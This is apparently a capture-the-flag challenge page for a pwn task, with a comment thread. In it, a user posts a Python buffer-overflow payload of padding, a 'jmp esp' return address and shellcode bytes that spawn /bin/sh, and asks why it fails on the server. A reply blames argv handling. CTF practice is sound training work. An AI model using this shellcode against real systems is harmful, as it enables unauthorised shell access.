Points: 43

Tags: pwn 

Poll rating:

Writeups

ActionRatingAuthor team
Read writeup
5.0
Epic Leet Team
Read writeup
not rated
nacayoshi00
You need to authenticate and join a team to post writeups fr0zenrainMay 1, 2017, 2:27 a.m.

code='Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
code += '\x82\xf7\x45\x00\x00\x00\x00\x00' #jmp esp
code += '\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' #shellcode
no canry and no NX,this code in my local process test is ok,but send to server not ok,why?thx


keplerMay 1, 2017, 5:09 a.m.

@fr0zenrain, didn't look into your shell code but I had similar issue: if I put NULL to argv before calling syscall, it worked in my local box but not server. I guess server might use busybox that requires argv[0] to be valid.